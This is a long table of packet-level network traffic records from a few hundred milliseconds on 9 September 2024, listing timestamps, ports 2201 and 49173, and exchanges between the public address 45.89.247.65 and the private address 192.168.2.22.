                                        Sep 9, 2024 17:34:45.507379055 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507395983 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507399082 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507431984 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507438898 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507452965 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507466078 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.507489920 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507514000 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.507536888 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508050919 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508090973 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.508099079 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508110046 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508122921 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508147001 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.508582115 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508620024 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.508635044 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508646965 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508660078 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508687019 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.508714914 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.508752108 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.509211063 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509242058 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509253025 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509282112 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.509356022 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509366989 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509377956 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509390116 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.509402990 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.509428978 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.509835958 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.510248899 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510260105 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510272026 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510302067 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.510333061 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510344028 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510354042 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510365963 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.510376930 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.510401964 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.511220932 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.512176037 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.560916901 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.560951948 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.560962915 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.560997009 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.561048985 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561059952 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561072111 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561099052 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.561330080 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561367035 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.561376095 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561388016 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561422110 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.561470985 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561482906 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561492920 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.561511993 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.562226057 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.562237024 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.562247992 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.562268019 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.562282085 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.562319040 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.563297987 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.572171926 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572206020 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572238922 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572263002 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.572361946 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572395086 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572413921 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.572427034 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.572475910 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.594348907 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594589949 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594619989 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594655991 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594655991 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.594691992 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594708920 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.594726086 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594760895 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594774008 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.594795942 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.594854116 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.595334053 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595367908 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595422983 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595424891 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.595489025 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595521927 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595541954 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.595556021 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.595602989 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.596174002 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596206903 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596240997 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596256971 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.596296072 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596328974 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596342087 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.596370935 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596405983 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.596419096 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.597111940 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597165108 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.597165108 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597201109 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597233057 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597249031 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.597269058 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597301006 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597316027 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.597342014 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.597387075 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.598119020 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598153114 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598186016 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.598206043 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598238945 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598256111 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.598272085 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.598316908 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637023926 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637052059 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637065887 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637077093 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637088060 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637099028 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637109995 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637109041 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637139082 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637145996 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637367010 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637388945 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637399912 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637423038 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637475967 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637487888 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637507915 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637784958 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637797117 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637808084 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.637820005 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.637833118 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651115894 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651129007 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651165009 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651228905 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651248932 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651258945 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651269913 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651278973 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651288986 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651289940 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651299953 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651305914 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651310921 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651320934 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651329041 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651330948 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651340961 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651350975 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651351929 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651369095 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651397943 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651407957 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651417971 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651427984 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651437044 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651447058 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651448011 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651456118 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651462078 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651467085 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651475906 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651485920 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651485920 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651496887 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651506901 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651527882 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651724100 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651734114 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651743889 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651755095 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651762962 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.651765108 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.651777029 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.653857946 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.660922050 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.660933971 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.660944939 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.660955906 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.660967112 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.660979986 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.661063910 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.661230087 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.661241055 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.661251068 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.661259890 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.661269903 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.661289930 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.661550999 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.662261963 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.662293911 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.682874918 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.682897091 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.682909012 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.682919025 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.682930946 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.682931900 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.682940960 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.682950020 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.682971001 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.682972908 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683002949 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683018923 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683028936 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683032990 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683039904 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683049917 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683059931 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683064938 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683069944 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683080912 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683083057 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683093071 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683098078 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683104038 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683115959 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683123112 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683125973 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683135986 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683146000 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683156013 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683156967 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683165073 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683173895 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683175087 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683185101 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683192015 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683212996 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683248997 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683259964 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683269024 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683280945 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683406115 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683415890 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683425903 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683437109 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683439016 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683496952 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683506966 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683516026 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.683518887 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.683525085 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.685215950 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.789170027 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789304972 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789345026 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.789355040 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789438009 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789448977 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789458990 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789473057 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.789506912 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789515972 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.789664984 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789696932 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.789740086 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789750099 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789779902 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.789791107 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789802074 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789813042 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789832115 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.789961100 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.789995909 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790014029 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790024996 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790055037 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790103912 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790239096 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790249109 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790258884 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790270090 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790288925 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790292978 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790301085 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790328979 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790544033 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790586948 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790596962 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790622950 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790692091 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790702105 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790708065 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790719986 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790726900 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790750027 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790807009 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790817976 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790827990 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790838003 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.790841103 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.790873051 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.791393995 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791404963 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791414976 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791435003 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.791505098 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791516066 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791523933 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791533947 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791538954 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.791562080 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.791608095 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791618109 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791626930 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.791639090 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.791999102 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.792073011 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.792083025 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.792093039 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.792107105 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.792165995 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.792176008 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.792186022 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.792196035 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.792196989 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.792220116 CEST491732201192.168.2.2245.89.247.65
                                        Sep 9, 2024 17:34:45.792300940 CEST22014917345.89.247.65192.168.2.22
                                        Sep 9, 2024 17:34:45.792314053 CEST22014917345.89.247.65192.168.2.22
